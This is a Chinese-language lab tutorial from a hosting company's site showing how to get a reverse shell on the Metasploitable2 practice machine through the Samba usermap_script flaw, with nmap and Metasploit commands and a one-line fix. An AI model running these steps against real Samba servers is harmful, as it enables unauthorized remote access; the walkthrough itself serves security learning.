您好,登錄后才能下訂單哦!
這篇文章主要介紹“如何利用samba服務(wù)漏洞獲取主機(jī)shell”,在日常操作中,相信很多人在如何利用samba服務(wù)漏洞獲取主機(jī)shell問(wèn)題上存在疑惑,小編查閱了各式資料,整理出簡(jiǎn)單好用的操作方法,希望對(duì)大家解答”如何利用samba服務(wù)漏洞獲取主機(jī)shell”的疑惑有所幫助!接下來(lái),請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧!
本次靶機(jī)的運(yùn)行系統(tǒng)是metasploitable2, 它是一個(gè)特制的ubuntu操作系統(tǒng),主要用于安全工具測(cè)試和演示常見(jiàn)的漏洞攻擊。
利用nmap掃描并查看系統(tǒng)開(kāi)放端口和相應(yīng)的的應(yīng)用程序,命令為nmap -sV 靶機(jī)地址,其中s是scan,V是version。
查看445端口和139端口中運(yùn)行著samba3.X-4.X的服務(wù),samba是一款基于SMB(server message block)協(xié)議的免費(fèi)軟件,SMB用于在局域網(wǎng)內(nèi)共享打印機(jī)和文件。
打開(kāi)Metasploit工具,在msf下輸入search samba,查找可利用的漏洞模塊。
選擇exploit/multi/samba/usermap_script,因?yàn)樗粯?biāo)記為excellent,輸入use exploit/multi/samba/usermap_script,利用該模塊,使用show payloads命令查看該模塊下的payload。
因?yàn)槟繕?biāo)機(jī)是linux機(jī),所以選擇linux的載荷,這里選擇基礎(chǔ)的cmd/unix/reverse反向攻擊載荷模塊,選擇命令set payload cmd/unix/reverse。
設(shè)置靶機(jī)地址:set RHOST 靶機(jī)地址
設(shè)置漏洞端口:set RPORT 445
設(shè)置攻擊機(jī)地址:set LHOST 攻擊機(jī)地址
使用 show options命令查看配置是否正確。
輸入exploit或run命令進(jìn)行攻擊,成功獲取目標(biāo)的主機(jī)的shell。
以上以linux系統(tǒng)滲透為例,windows系統(tǒng)的滲透過(guò)程其實(shí)也差不多,只不過(guò)可能利用的漏洞模塊和載荷的組合方式可能不一樣。防御方法:將samba服務(wù)升級(jí)到最新版本,即可防御該漏洞。
到此,關(guān)于“如何利用samba服務(wù)漏洞獲取主機(jī)shell”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注億速云網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。